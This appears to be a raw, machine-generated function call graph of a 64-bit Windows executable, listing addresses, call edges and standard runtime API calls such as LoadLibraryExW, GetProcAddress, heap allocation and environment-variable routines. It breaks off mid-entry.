7ff61d3219d3 18426->18428 18429 7ff61d32196f 18426->18429 18427 7ff61d335170 45 API calls 18427->18429 18428->16385 18429->18427 18429->18428 18431 7ff61d328be0 57 API calls 18430->18431 18432 7ff61d328287 LoadLibraryExW 18431->18432 18433 7ff61d3282a4 __std_exception_copy 18432->18433 18433->16401 18435 7ff61d326f29 18434->18435 18436 7ff61d326f4c GetProcAddress 18434->18436 18439 7ff61d3229e0 57 API calls 18435->18439 18436->18435 18437 7ff61d326f71 GetProcAddress 18436->18437 18437->18435 18438 7ff61d326f96 GetProcAddress 18437->18438 18438->18435 18440 7ff61d326fbe GetProcAddress 18438->18440 18441 7ff61d326f3c 18439->18441 18440->18435 18442 7ff61d326fe6 GetProcAddress 18440->18442 18441->16407 18442->18435 18494 7ff61d325be0 18493->18494 18495 7ff61d321ef0 49 API calls 18494->18495 18496 7ff61d325c12 18495->18496 18497 7ff61d325c3b 18496->18497 18498 7ff61d325c1b 18496->18498 18500 7ff61d325c92 18497->18500 18503 7ff61d324060 49 API calls 18497->18503 18499 7ff61d322b30 59 API calls 18498->18499 18502 7ff61d325c31 18499->18502 18501 7ff61d324060 49 API calls 18500->18501 18504 7ff61d325cab 18501->18504 18506 7ff61d32bdc0 _wfindfirst32i64 8 API calls 18502->18506 18505 7ff61d325c5c 18503->18505 18507 7ff61d325cc9 18504->18507 18511 7ff61d322b30 59 API calls 18504->18511 18508 7ff61d325c7a 18505->18508 18513 7ff61d322b30 59 API calls 18505->18513 18510 7ff61d32346e 18506->18510 18512 7ff61d328270 58 API calls 18507->18512 18509 7ff61d323f70 57 API calls 18508->18509 18514 7ff61d325c84 18509->18514 18510->16422 18521 7ff61d325d30 18510->18521 18511->18507 18515 7ff61d325cd6 18512->18515 18513->18508 18514->18500 18519 7ff61d328270 58 API calls 18514->18519 18516 7ff61d325cdb 18515->18516 18517 7ff61d325cfd 18515->18517 18520 7ff61d3229e0 57 API calls 18516->18520 18591 7ff61d3251f0 GetProcAddress 18517->18591 18519->18500 18520->18502 18675 7ff61d324df0 18521->18675 18523 7ff61d325d54 18524 7ff61d325d6d 18523->18524 18525 7ff61d325d5c 18523->18525 18682 7ff61d324540 18524->18682 18526 7ff61d322b30 59 API calls 18525->18526 18532 7ff61d325d68 18526->18532 18529 7ff61d325d79 18530 7ff61d325d8a 18532->16424 18563 7ff61d325947 18562->18563 18563->18563 18564 7ff61d325970 18563->18564 18568 7ff61d325987 __std_exception_copy 18563->18568 18592 7ff61d325230 GetProcAddress 18591->18592 18593 7ff61d325212 18591->18593 18592->18593 18594 7ff61d325255 GetProcAddress 18592->18594 18595 7ff61d3229e0 57 API calls 18593->18595 18594->18593 18596 7ff61d32527a GetProcAddress 18594->18596 18597 7ff61d325225 18595->18597 18596->18593 18598 7ff61d3252a2 GetProcAddress 18596->18598 18597->18502 18598->18593 18599 7ff61d3252ca GetProcAddress 18598->18599 18599->18593 18600 7ff61d3252f2 GetProcAddress 18599->18600 18600->18593 18601 7ff61d32531a GetProcAddress 18600->18601 18677 7ff61d324e15 18675->18677 18676 7ff61d324e1d 18676->18523 18677->18676 18680 7ff61d324faf 18677->18680 18717 7ff61d3370b8 18677->18717 18678 7ff61d32515a __std_exception_copy 18678->18523 18679 7ff61d324260 47 API calls 18679->18680 18680->18678 18680->18679 18683 7ff61d324570 18682->18683 18684 7ff61d32bdc0 _wfindfirst32i64 8 API calls 18683->18684 18685 7ff61d3245d2 18684->18685 18685->18529 18685->18530 18718 7ff61d3370e8 18717->18718 18721 7ff61d3365b4 18718->18721 18720 7ff61d337118 18720->18677 18722 7ff61d3365f7 18721->18722 18723 7ff61d3365e5 18721->18723 18725 7ff61d336641 18722->18725 18727 7ff61d336604 18722->18727 18724 7ff61d3355c4 _findclose 11 API calls 18723->18724 18726 7ff61d3365ea 18724->18726 18729 7ff61d334a00 45 API calls 18725->18729 18732 7ff61d33665c 18725->18732 18731 7ff61d33afa4 _invalid_parameter_noinfo 37 API calls 18726->18731 18728 7ff61d33aed8 _invalid_parameter_noinfo 37 API calls 18727->18728 18739 7ff61d3365f5 18728->18739 18729->18732 18731->18739 18733 7ff61d33667e 18732->18733 18742 7ff61d337040 18732->18742 18734 7ff61d33671f 18733->18734 18735 7ff61d3355c4 _findclose 11 API calls 18733->18735 18734->18739 18739->18720 18743 7ff61d33707a 18742->18743 18744 7ff61d337063 18742->18744 18802 7ff61d33b810 __CxxCallCatchBlock 45 API calls 18801->18802 18803 7ff61d33aa71 18802->18803 18804 7ff61d33ab9c __CxxCallCatchBlock 45 API calls 18803->18804 18805 7ff61d33aa91 18804->18805 19016 7ff61d34ac89 19017 7ff61d34ac98 19016->19017 19018 7ff61d34aca2 19016->19018 19020 7ff61d340e18 LeaveCriticalSection 19017->19020 19021 7ff61d32c090 19022 7ff61d32c0a0 19021->19022 19038 7ff61d33a238 19022->19038 19024 7ff61d32c0ac 19044 7ff61d32c398 19024->19044 19026 7ff61d32c67c 7 API calls 19028 7ff61d32c145 19026->19028 19027 7ff61d32c0c4 _RTC_Initialize 19036 7ff61d32c119 19027->19036 19049 7ff61d32c548 19027->19049 19030 7ff61d32c0d9 19052 7ff61d3396a4 19030->19052 19036->19026 19037 7ff61d32c135 19036->19037 19039 7ff61d33a249 19038->19039 19040 7ff61d33a251 19039->19040 19041 7ff61d3355c4 _findclose 11 API calls 19039->19041 19040->19024 19042 7ff61d33a260 19041->19042 19043 7ff61d33afa4 _invalid_parameter_noinfo 37 API calls 19042->19043 19043->19040 19045 7ff61d32c3a9 19044->19045 19048 7ff61d32c3ae __scrt_release_startup_lock 19044->19048 19046 7ff61d32c67c 7 API calls 19045->19046 19045->19048 19047 7ff61d32c422 19046->19047 19048->19027 19077 7ff61d32c50c 19049->19077 19051 7ff61d32c551 19051->19030 19053 7ff61d3396c4 19052->19053 19075 7ff61d32c0e5 19052->19075 19054 7ff61d3396cc 19053->19054 19055 7ff61d3396e2 GetModuleFileNameW 19053->19055 19056 7ff61d3355c4 _findclose 11 API calls 19054->19056 19059 7ff61d33970d 19055->19059 19057 7ff61d3396d1 19056->19057 19058 7ff61d33afa4 _invalid_parameter_noinfo 37 API calls 19057->19058 19058->19075 19092 7ff61d339644 19059->19092 19062 7ff61d33976d 19067 7ff61d33978f 19062->19067 19069 7ff61d3397bb 19062->19069 19070 7ff61d3397d4 19062->19070 19063 7ff61d339755 19064 7ff61d3355c4 _findclose 11 API calls 19063->19064 19065 7ff61d33975a 19064->19065 19066 7ff61d33b00c __free_lconv_mon 11 API calls 19065->19066 19066->19075 19068 7ff61d33b00c __free_lconv_mon 11 API calls 19067->19068 19068->19075 19071 7ff61d33b00c __free_lconv_mon 11 API calls 19069->19071 19073 7ff61d33b00c __free_lconv_mon 11 API calls 19070->19073 19072 7ff61d3397c4 19071->19072 19074 7ff61d33b00c __free_lconv_mon 11 API calls 19072->19074 19073->19067 19074->19075 19075->19036 19076 7ff61d32c61c InitializeSListHead 19075->19076 19078 7ff61d32c526 19077->19078 19080 7ff61d32c51f 19077->19080 19081 7ff61d33a87c 19078->19081 19080->19051 19084 7ff61d33a4b8 19081->19084 19091 7ff61d340db8 EnterCriticalSection 19084->19091 19093 7ff61d33965c 19092->19093 19097 7ff61d339694 19092->19097 19094 7ff61d33f258 _findclose 11 API calls 19093->19094 19093->19097 19095 7ff61d33968a 19094->19095 19096 7ff61d33b00c __free_lconv_mon 11 API calls 19095->19096 19096->19097 19097->19062 19097->19063 19375 7ff61d335410 19376 7ff61d33541b 19375->19376 19384 7ff61d33f864 19376->19384 19397 7ff61d340db8 EnterCriticalSection 19384->19397 19098 7ff61d33b690 19099 7ff61d33b695 19098->19099 19103 7ff61d33b6aa 19098->19103 19104 7ff61d33b6b0 19099->19104 19105 7ff61d33b6fa 19104->19105 19106 7ff61d33b6f2 19104->19106 19108 7ff61d33b00c __free_lconv_mon 11 API calls 19105->19108 19107 7ff61d33b00c __free_lconv_mon 11 API calls 19106->19107 19107->19105 19109 7ff61d33b707 19108->19109 19110 7ff61d33b00c __free_lconv_mon 11 API calls 19109->19110 19111 7ff61d33b714 19110->19111 19112 7ff61d33b00c __free_lconv_mon 11 API calls 19111->19112 19113 7ff61d33b721 19112->19113 19114 7ff61d33b00c __free_lconv_mon 11 API calls 19113->19114 19115 7ff61d33b72e 19114->19115 19116 7ff61d33b00c __free_lconv_mon 11 API calls 19115->19116 19117 7ff61d33b73b 19116->19117 19118 7ff61d33b00c __free_lconv_mon 11 API calls 19117->19118 19119 7ff61d33b748 19118->19119 19120 7ff61d33b00c __free_lconv_mon 11 API calls 19119->19120 19121 7ff61d33b755 19120->19121 19122 7ff61d33b00c __free_lconv_mon 11 API calls 19121->19122 19123 7ff61d33b765 19122->19123 19124 7ff61d33b00c __free_lconv_mon 11 API calls 19123->19124 19125 7ff61d33b775 19124->19125 19130 7ff61d33b558 19125->19130 19144 7ff61d340db8 EnterCriticalSection 19130->19144 19405 7ff61d341e20 19416 7ff61d347db4 19405->19416 19417 7ff61d347dc1 19416->19417 19418 7ff61d33b00c __free_lconv_mon 11 API calls 19417->19418 19419 7ff61d347ddd 19417->19419 19418->19417 19420 7ff61d33b00c __free_lconv_mon 11 API calls 19419->19420 19421 7ff61d341e29 19419->19421 19420->19419 19422 7ff61d340db8 EnterCriticalSection 19421->19422 15198 7ff61d341038 15199 7ff61d34105c 15198->15199 15202 7ff61d34106c 15198->15202 15349 7ff61d3355c4 15199->15349 15201 7ff61d34134c 15204 7ff61d3355c4 _findclose 11 API calls 15201->15204 15202->15201 15203 7ff61d34108e 15202->15203 15205 7ff61d3410af 15203->15205 15352 7ff61d3416f4 15203->15352 15206 7ff61d341351 15204->15206 15209 7ff61d341121 15205->15209 15211 7ff61d3410d5 15205->15211 15215 7ff61d341115 15205->15215 15208 7ff61d33b00c __free_lconv_mon 11 API calls 15206->15208 15219 7ff61d341061 15208->15219 15213 7ff61d33f258 _findclose 11 API calls 15209->15213 15229 7ff61d3410e4 15209->15229 15210 7ff61d3411ce 15223 7ff61d3411eb 15210->15223 15230 7ff61d34123d 15210->15230 15367 7ff61d339d50 15211->15367 15216 7ff61d341137 15213->15216 15215->15210 15215->15229 15379 7ff61d347afc 15215->15379 15220 7ff61d33b00c __free_lconv_mon 11 API calls 15216->15220 15225 7ff61d341145 15220->15225 15221 7ff61d3410fd 15221->15215 15228 7ff61d3416f4 45 API calls 15221->15228 15222 7ff61d3410df 15226 7ff61d3355c4 _findclose 11 API calls 15222->15226 15224 7ff61d33b00c __free_lconv_mon 11 API calls 15223->15224 15227 7ff61d3411f4 15224->15227 15225->15215 15225->15229 15233 7ff61d33f258 _findclose 11 API calls 15225->15233 15226->15229 15238 7ff61d3411f9 15227->15238 15415 7ff61d343b4c 15227->15415 15228->15215 15373 7ff61d33b00c 15229->15373 15230->15229 15231 7ff61d343b4c 40 API calls 15230->15231 15232 7ff61d34127a 15231->15232 15234 7ff61d33b00c __free_lconv_mon 11 API calls 15232->15234 15236 7ff61d341167 15233->15236 15237 7ff61d341284 15234->15237 15241 7ff61d33b00c __free_lconv_mon 11 API calls 15236->15241 15237->15229 15237->15238 15239 7ff61d341340 15238->15239 15329 7ff61d33f258 15238->15329 15242 7ff61d33b00c __free_lconv_mon 11 API calls 15239->15242 15240 7ff61d341225 15243 7ff61d33b00c __free_lconv_mon 11 API calls 15240->15243 15241->15215 15242->15219 15243->15238 15246 7ff61d3412d9 15336 7ff61d33ab3c 15246->15336 15247 7ff61d3412d0 15249 7ff61d33b00c __free_lconv_mon 11 API calls 15247->15249 15251 7ff61d3412d7 15249->15251 15256 7ff61d33b00c __free_lconv_mon 11 API calls 15251->15256 15252 7ff61d34137b 15345 7ff61d33afc4 IsProcessorFeaturePresent 15252->15345 15253 7ff61d3412f0 15424 7ff61d347c14 15253->15424 15256->15219 15259 7ff61d341338 15264 7ff61d33b00c __free_lconv_mon 11 API calls 15259->15264 15260 7ff61d341317 15262 7ff61d3355c4 _findclose 11 API calls 15260->15262 15265 7ff61d34131c 15262->15265 15264->15239 15268 7ff61d33b00c __free_lconv_mon 11 API calls 15265->15268 15268->15251 15330 7ff61d33f269 _findclose 15329->15330 15331 7ff61d33f2ba 15330->15331 15332 7ff61d33f29e RtlAllocateHeap 15330->15332 15443 7ff61d343d00 15330->15443 15334 7ff61d3355c4 _findclose 10 API calls 15331->15334 15332->15330 15333 7ff61d33f2b8 15332->15333 15333->15246 15333->15247 15334->15333 15337 7ff61d33ab49 15336->15337 15338 7ff61d33ab53 15336->15338 15337->15338 15342 7ff61d33ab6e 15337->15342 15339 7ff61d3355c4 _findclose 11 API calls 15338->15339 15344 7ff61d33ab5a 15339->15344 15341 7ff61d33ab66 15341->15252 15341->15253 15342->15341 15343 7ff61d3355c4 _findclose 11 API calls 15342->15343 15343->15344 15452 7ff61d33afa4 15344->15452 15346 7ff61d33afd7 15345->15346 15511 7ff61d33acd8 15346->15511 15533 7ff61d33b988 GetLastError 15349->15533 15351 7ff61d3355cd 15351->15219 15353 7ff61d341729 15352->15353 15360 7ff61d341711 15352->15360 15354 7ff61d33f258 _findclose 11 API calls 15353->15354 15355 7ff61d34174d 15354->15355 15356 7ff61d3417ae 15355->15356 15361 7ff61d33f258 _findclose 11 API calls 15355->15361 15362 7ff61d33b00c __free_lconv_mon 11 API calls 15355->15362 15363 7ff61d33ab3c __std_exception_copy 37 API calls 15355->15363 15364 7ff61d3417bd 15355->15364 15366 7ff61d3417d2 15355->15366 15358 7ff61d33b00c __free_lconv_mon 11 API calls 15356->15358 15358->15360 15360->15205 15361->15355 15362->15355 15363->15355 15365 7ff61d33afc4 _wfindfirst32i64 17 API calls 15364->15365 15365->15366 15550 7ff61d33ab9c 15366->15550 15368 7ff61d339d60 15367->15368 15372 7ff61d339d69 15367->15372 15368->15372 15616 7ff61d339828 15368->15616 15372->15221 15372->15222 15374 7ff61d33b040 15373->15374 15375 7ff61d33b011 RtlRestoreThreadPreferredUILanguages 15373->15375 15374->15219 15375->15374 15376 7ff61d33b02c GetLastError 15375->15376 15377 7ff61d33b039 __free_lconv_mon 15376->15377 15378 7ff61d3355c4 _findclose 9 API calls 15377->15378 15378->15374 15380 7ff61d347b09 15379->15380 15381 7ff61d346cac 15379->15381 15383 7ff61d335098 45 API calls 15380->15383 15382 7ff61d346cb9 15381->15382 15388 7ff61d346cef 15381->15388 15386 7ff61d3355c4 _findclose 11 API calls 15382->15386 15402 7ff61d346c60 15382->15402 15385 7ff61d347b3d 15383->15385 15384 7ff61d346d19 15387 7ff61d3355c4 _findclose 11 API calls 15384->15387 15393 7ff61d347b53 15385->15393 15397 7ff61d347b6a 15385->15397 15413 7ff61d347b42 15385->15413 15389 7ff61d346cc3 15386->15389 15391 7ff61d346d1e 15387->15391 15388->15384 15392 7ff61d346d3e 15388->15392 15390 7ff61d33afa4 _invalid_parameter_noinfo 37 API calls 15389->15390 15394 7ff61d346cce 15390->15394 15395 7ff61d33afa4 _invalid_parameter_noinfo 37 API calls 15391->15395 15396 7ff61d346d29 15392->15396 15403 7ff61d335098 45 API calls 15392->15403 15398 7ff61d3355c4 _findclose 11 API calls 15393->15398 15394->15215 15395->15396 15396->15215 15400 7ff61d347b86 15397->15400 15401 7ff61d347b74 15397->15401 15399 7ff61d347b58 15398->15399 15404 7ff61d33afa4 _invalid_parameter_noinfo 37 API calls 15399->15404 15406 7ff61d347b97 15400->15406 15407 7ff61d347bae 15400->15407 15405 7ff61d3355c4 _findclose 11 API calls 15401->15405 15402->15215 15403->15396 15404->15413 15408 7ff61d347b79 15405->15408 15909 7ff61d346cfc 15406->15909 15918 7ff61d349924 15407->15918 15411 7ff61d33afa4 _invalid_parameter_noinfo 37 API calls 15408->15411 15411->15413 15413->15215 15414 7ff61d3355c4 _findclose 11 API calls 15414->15413 15416 7ff61d343b8b 15415->15416 15417 7ff61d343b6e 15415->15417 15419 7ff61d343b95 15416->15419 15958 7ff61d348608 15416->15958 15417->15416 15418 7ff61d343b7c 15417->15418 15420 7ff61d3355c4 _findclose 11 API calls 15418->15420 15965 7ff61d340fbc 15419->15965 15423 7ff61d343b81 __scrt_get_show_window_mode 15420->15423 15423->15240 15425 7ff61d335098 45 API calls 15424->15425 15426 7ff61d347c7a 15425->15426 15428 7ff61d347c88 15426->15428 15977 7ff61d33f4e4 15426->15977 15980 7ff61d335684 15428->15980 15431 7ff61d347d74 15434 7ff61d347d85 15431->15434 15435 7ff61d33b00c __free_lconv_mon 11 API calls 15431->15435 15432 7ff61d335098 45 API calls 15433 7ff61d347cf7 15432->15433 15437 7ff61d33f4e4 5 API calls 15433->15437 15439 7ff61d347d00 15433->15439 15436 7ff61d341313 15434->15436 15438 7ff61d33b00c __free_lconv_mon 11 API calls 15434->15438 15435->15434 15436->15259 15436->15260 15437->15439 15438->15436 15440 7ff61d335684 14 API calls 15439->15440 15441 7ff61d347d5b 15440->15441 15441->15431 15442 7ff61d347d63 SetEnvironmentVariableW 15441->15442 15442->15431 15446 7ff61d343d40 15443->15446 15451 7ff61d340db8 EnterCriticalSection 15446->15451 15454 7ff61d33ae3c 15452->15454 15455 7ff61d33ae67 15454->15455 15458 7ff61d33aed8 15455->15458 15457 7ff61d33ae8e 15466 7ff61d33ac20 15458->15466 15461 7ff61d33af13 15461->15457 15464 7ff61d33afc4 _wfindfirst32i64 17 API calls 15465 7ff61d33afa3 15464->15465 15467 7ff61d33ac77 15466->15467 15468 7ff61d33ac3c GetLastError 15466->15468 15467->15461 15472 7ff61d33ac8c 15467->15472 15469 7ff61d33ac4c 15468->15469 15475 7ff61d33ba50 15469->15475 15473 7ff61d33aca8 GetLastError SetLastError 15472->15473 15474 7ff61d33acc0 15472->15474 15473->15474 15474->15461 15474->15464 15476 7ff61d33ba8a FlsSetValue 15475->15476 15477 7ff61d33ba6f FlsGetValue 15475->15477 15478 7ff61d33ba97 15476->15478 15479 7ff61d33ac67 SetLastError 15476->15479 15477->15479 15480 7ff61d33ba84 15477->15480 15481 7ff61d33f258 _findclose 11 API calls 15478->15481 15479->15467 15480->15476 15482 7ff61d33baa6 15481->15482 15483 7ff61d33bac4 FlsSetValue 15482->15483 15484 7ff61d33bab4 FlsSetValue 15482->15484 15486 7ff61d33bad0 FlsSetValue 15483->15486 15487 7ff61d33bae2 15483->15487 15485 7ff61d33babd 15484->15485 15488 7ff61d33b00c __free_lconv_mon 11 API calls 15485->15488 15486->15485 15492 7ff61d33b5b8 15487->15492 15488->15479 15497 7ff61d33b490 15492->15497 15509 7ff61d340db8 EnterCriticalSection 15497->15509 15512 7ff61d33ad12 _wfindfirst32i64 __scrt_get_show_window_mode 15511->15512 15513 7ff61d33ad3a RtlCaptureContext RtlLookupFunctionEntry 15512->15513 15514 7ff61d33adaa IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15513->15514 15515 7ff61d33ad74 RtlVirtualUnwind 15513->15515 15518 7ff61d33adfc _wfindfirst32i64 15514->15518 15515->15514 15519 7ff61d32bdc0 15518->15519 15520 7ff61d32bdc9 15519->15520 15521 7ff61d32bdd4 GetCurrentProcess TerminateProcess 15520->15521 15522 7ff61d32be20 IsProcessorFeaturePresent 15520->15522 15523 7ff61d32be38 15522->15523 15528 7ff61d32c014 RtlCaptureContext 15523->15528 15529 7ff61d32c02e RtlLookupFunctionEntry 15528->15529 15530 7ff61d32be4b 15529->15530 15531 7ff61d32c044 RtlVirtualUnwind 15529->15531 15532 7ff61d32bde0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15530->15532 15531->15529 15531->15530 15534 7ff61d33b9c9 FlsSetValue 15533->15534 15539 7ff61d33b9ac 15533->15539 15535 7ff61d33b9b9 15534->15535 15536 7ff61d33b9db 15534->15536 15537 7ff61d33ba35 SetLastError 15535->15537 15538 7ff61d33f258 _findclose 5 API calls 15536->15538 15537->15351 15540 7ff61d33b9ea 15538->15540 15539->15534 15539->15535 15541 7ff61d33ba08 FlsSetValue 15540->15541 15542 7ff61d33b9f8 FlsSetValue 15540->15542 15544 7ff61d33ba26 15541->15544 15545 7ff61d33ba14 FlsSetValue 15541->15545 15543 7ff61d33ba01 15542->15543 15547 7ff61d33b00c __free_lconv_mon 5 API calls 15543->15547 15546 7ff61d33b5b8 _findclose 5 API calls 15544->15546 15545->15543 15548 7ff61d33ba2e 15546->15548 15547->15535 15549 7ff61d33b00c __free_lconv_mon 5 API calls 15548->15549 15549->15537 15559 7ff61d343dc0 15550->15559 15585 7ff61d343d78 15559->15585 15590 7ff61d340db8 EnterCriticalSection 15585->15590 15617 7ff61d339841 15616->15617 15630 7ff61d33983d 15616->15630 15639 7ff61d342d60 15617->15639 15622 7ff61d33985f 15665 7ff61d33990c 15622->15665 15623 7ff61d339853 15625 7ff61d33b00c __free_lconv_mon 11 API calls 15623->15625 15625->15630 15627 7ff61d33b00c __free_lconv_mon 11 API calls 15628 7ff61d339886 15627->15628 15629 7ff61d33b00c __free_lconv_mon 11 API calls 15628->15629 15629->15630 15630->15372 15631 7ff61d339b7c 15630->15631 15632 7ff61d339ba5 15631->15632 15638 7ff61d339bbe 15631->15638 15632->15372 15633 7ff61d33f258 _findclose 11 API calls 15633->15638 15634 7ff61d339c4e 15636 7ff61d33b00c __free_lconv_mon 11 API calls 15634->15636 15635 7ff61d3405c8 WideCharToMultiByte 15635->15638 15636->15632 15637 7ff61d33b00c __free_lconv_mon 11 API calls 15637->15638 15638->15632 15638->15633 15638->15634 15638->15635 15638->15637 15640 7ff61d342d6d 15639->15640 15644 7ff61d339846 15639->15644 15684 7ff61d33b8e4 15640->15684 15645 7ff61d34309c GetEnvironmentStringsW 15644->15645 15646 7ff61d3430cc 15645->15646 15647 7ff61d33984b 15645->15647 15648 7ff61d3405c8 WideCharToMultiByte 15646->15648 15647->15622 15647->15623 15649 7ff61d34311d 15648->15649 15650 7ff61d343124 FreeEnvironmentStringsW 15649->15650 15651 7ff61d33dcbc _fread_nolock 12 API calls 15649->15651 15650->15647 15652 7ff61d343137 15651->15652 15653 7ff61d343148 15652->15653 15654 7ff61d34313f 15652->15654 15656 7ff61d3405c8 WideCharToMultiByte 15653->15656 15655 7ff61d33b00c __free_lconv_mon 11 API calls 15654->15655 15657 7ff61d343146 15655->15657 15658 7ff61d34316b 15656->15658 15657->15650 15659 7ff61d343179 15658->15659 15660 7ff61d34316f 15658->15660 15662 7ff61d33b00c __free_lconv_mon 11 API calls 15659->15662 15661 7ff61d33b00c __free_lconv_mon 11 API calls 15660->15661 15663 7ff61d343177 FreeEnvironmentStringsW 15661->15663 15662->15663 15663->15647 15666 7ff61d339931 15665->15666 15667 7ff61d33f258 _findclose 11 API calls 15666->15667 15679 7ff61d339967 15667->15679 15668 7ff61d33996f 15669 7ff61d33b00c __free_lconv_mon 11 API calls 15668->15669 15670 7ff61d339867 15669->15670 15670->15627 15671 7ff61d3399e2 15672 7ff61d33b00c __free_lconv_mon 11 API calls 15671->15672 15672->15670 15673 7ff61d33f258 _findclose 11 API calls 15673->15679 15674 7ff61d3399d1 15903 7ff61d339b38 15674->15903 15675 7ff61d33ab3c __std_exception_copy 37 API calls 15675->15679 15678 7ff61d339a07 15681 7ff61d33afc4 _wfindfirst32i64 17 API calls 15678->15681 15679->15668 15679->15671 15679->15673 15679->15674 15679->15675 15679->15678 15682 7ff61d33b00c __free_lconv_mon 11 API calls 15679->15682 15680 7ff61d33b00c __free_lconv_mon 11 API calls 15680->15668 15683 7ff61d339a1a 15681->15683 15682->15679 15685 7ff61d33b910 FlsSetValue 15684->15685 15686 7ff61d33b8f5 FlsGetValue 15684->15686 15687 7ff61d33b91d 15685->15687 15688 7ff61d33b902 15685->15688 15686->15688 15689 7ff61d33b90a 15686->15689 15692 7ff61d33f258 _findclose 11 API calls 15687->15692 15690 7ff61d33b908 15688->15690 15691 7ff61d33ab9c __CxxCallCatchBlock 45 API calls 15688->15691 15689->15685 15704 7ff61d342a34 15690->15704 15693 7ff61d33b985 15691->15693 15694 7ff61d33b92c 15692->15694 15695 7ff61d33b94a FlsSetValue 15694->15695 15696 7ff61d33b93a FlsSetValue 15694->15696 15698 7ff61d33b968 15695->15698 15699 7ff61d33b956 FlsSetValue 15695->15699 15697 7ff61d33b943 15696->15697 15700 7ff61d33b00c __free_lconv_mon 11 API calls 15697->15700 15701 7ff61d33b5b8 _findclose 11 API calls 15698->15701 15699->15697 15700->15688 15702 7ff61d33b970 15701->15702 15703 7ff61d33b00c __free_lconv_mon 11 API calls 15702->15703 15703->15690 15727 7ff61d342ca4 15704->15727 15706 7ff61d342a69 15742 7ff61d342734 15706->15742 15709 7ff61d342a86 15709->15644 15712 7ff61d342a9f 15713 7ff61d33b00c __free_lconv_mon 11 API calls 15712->15713 15713->15709 15714 7ff61d342aae 15714->15714 15756 7ff61d342ddc 15714->15756 15717 7ff61d342baa 15718 7ff61d3355c4 _findclose 11 API calls 15717->15718 15719 7ff61d342baf 15718->15719 15722 7ff61d33b00c __free_lconv_mon 11 API calls 15719->15722 15720 7ff61d342c05 15721 7ff61d342c6c 15720->15721 15767 7ff61d342564 15720->15767 15726 7ff61d33b00c __free_lconv_mon 11 API calls 15721->15726 15722->15709 15723 7ff61d342bc4 15723->15720 15724 7ff61d33b00c __free_lconv_mon 11 API calls 15723->15724 15724->15720 15726->15709 15728 7ff61d342cc7 15727->15728 15729 7ff61d342cd1 15728->15729 15782 7ff61d340db8 EnterCriticalSection 15728->15782 15731 7ff61d342d43 15729->15731 15733 7ff61d33ab9c __CxxCallCatchBlock 45 API calls 15729->15733 15731->15706 15735 7ff61d342d5b 15733->15735 15737 7ff61d342db2 15735->15737 15739 7ff61d33b8e4 50 API calls 15735->15739 15737->15706 15740 7ff61d342d9c 15739->15740 15741 7ff61d342a34 65 API calls 15740->15741 15741->15737 15783 7ff61d335098 15742->15783 15745 7ff61d342766 15747 7ff61d34277b 15745->15747 15748 7ff61d34276b GetACP 15745->15748 15746 7ff61d342754 GetOEMCP 15746->15747 15747->15709 15749 7ff61d33dcbc 15747->15749 15748->15747 15750 7ff61d33dd07 15749->15750 15751 7ff61d33dccb _findclose 15749->15751 15752 7ff61d3355c4 _findclose 11 API calls 15750->15752 15751->15750 15753 7ff61d33dcee RtlAllocateHeap 15751->15753 15755 7ff61d343d00 _findclose 2 API calls 15751->15755 15754 7ff61d33dd05 15752->15754 15753->15751 15753->15754 15754->15712 15754->15714 15755->15751 15757 7ff61d342734 47 API calls 15756->15757 15758 7ff61d342e09 15757->15758 15759 7ff61d342f5f 15758->15759 15761 7ff61d342e46 IsValidCodePage 15758->15761 15766 7ff61d342e60 __scrt_get_show_window_mode 15758->15766 15760 7ff61d32bdc0 _wfindfirst32i64 8 API calls 15759->15760 15762 7ff61d342ba1 15760->15762 15761->15759 15763 7ff61d342e57 15761->15763 15762->15717 15762->15723 15764 7ff61d342e86 GetCPInfo 15763->15764 15763->15766 15764->15759 15764->15766 15815 7ff61d34284c 15766->15815 15902 7ff61d340db8 EnterCriticalSection 15767->15902 15784 7ff61d3350b7 15783->15784 15785 7ff61d3350bc 15783->15785 15784->15745 15784->15746 15785->15784 15786 7ff61d33b810 __CxxCallCatchBlock 45 API calls 15785->15786 15787 7ff61d3350d7 15786->15787 15791 7ff61d33e044 15787->15791 15792 7ff61d33e059 15791->15792 15793 7ff61d3350fa 15791->15793 15792->15793 15799 7ff61d343a74 15792->15799 15795 7ff61d33e0b0 15793->15795 15796 7ff61d33e0d8 15795->15796 15797 7ff61d33e0c5 15795->15797 15796->15784 15797->15796 15812 7ff61d342dc0 15797->15812 15800 7ff61d33b810 __CxxCallCatchBlock 45 API calls 15799->15800 15801 7ff61d343a83 15800->15801 15802 7ff61d343ace 15801->15802 15811 7ff61d340db8 EnterCriticalSection 15801->15811 15802->15793 15813 7ff61d33b810 __CxxCallCatchBlock 45 API calls 15812->15813 15814 7ff61d342dc9 15813->15814 15816 7ff61d342889 GetCPInfo 15815->15816 15817 7ff61d34297f 15815->15817 15816->15817 15822 7ff61d34289c 15816->15822 15818 7ff61d32bdc0 _wfindfirst32i64 8 API calls 15817->15818 15820 7ff61d342a1e 15818->15820 15820->15759 15826 7ff61d3435b0 15822->15826 15827 7ff61d335098 45 API calls 15826->15827 15828 7ff61d3435f2 15827->15828 15846 7ff61d33fd00 15828->15846 15848 7ff61d33fd09 MultiByteToWideChar 15846->15848 15904 7ff61d3399d9 15903->15904 15905 7ff61d339b3d 15903->15905 15904->15680 15906 7ff61d339b66 15905->15906 15907 7ff61d33b00c __free_lconv_mon 11 API calls 15905->15907 15908 7ff61d33b00c __free_lconv_mon 11 API calls 15906->15908 15907->15905 15908->15904 15910 7ff61d346d19 15909->15910 15911 7ff61d346d30 15909->15911 15912 7ff61d3355c4 _findclose 11 API calls 15910->15912 15911->15910 15914 7ff61d346d3e 15911->15914 15913 7ff61d346d1e 15912->15913 15915 7ff61d33afa4 _invalid_parameter_noinfo 37 API calls 15913->15915 15916 7ff61d335098 45 API calls 15914->15916 15917 7ff61d346d29 15914->15917 15915->15917 15916->15917 15917->15413 15919 7ff61d335098 45 API calls 15918->15919 15920 7ff61d349949 15919->15920 15923 7ff61d3495a0 15920->15923 15926 7ff61d3495ee 15923->15926 15924 7ff61d32bdc0 _wfindfirst32i64 8 API calls 15925 7ff61d347bd5 15924->15925 15925->15413 15925->15414 15927 7ff61d349675 15926->15927 15929 7ff61d349660 GetCPInfo 15926->15929 15932 7ff61d349679 15926->15932 15928 7ff61d33fd00 _fread_nolock MultiByteToWideChar 15927->15928 15927->15932 15930 7ff61d34970d 15928->15930 15929->15927 15929->15932 15931 7ff61d33dcbc _fread_nolock 12 API calls 15930->15931 15930->15932 15933 7ff61d349744 15930->15933 15931->15933 15932->15924 15933->15932 15934 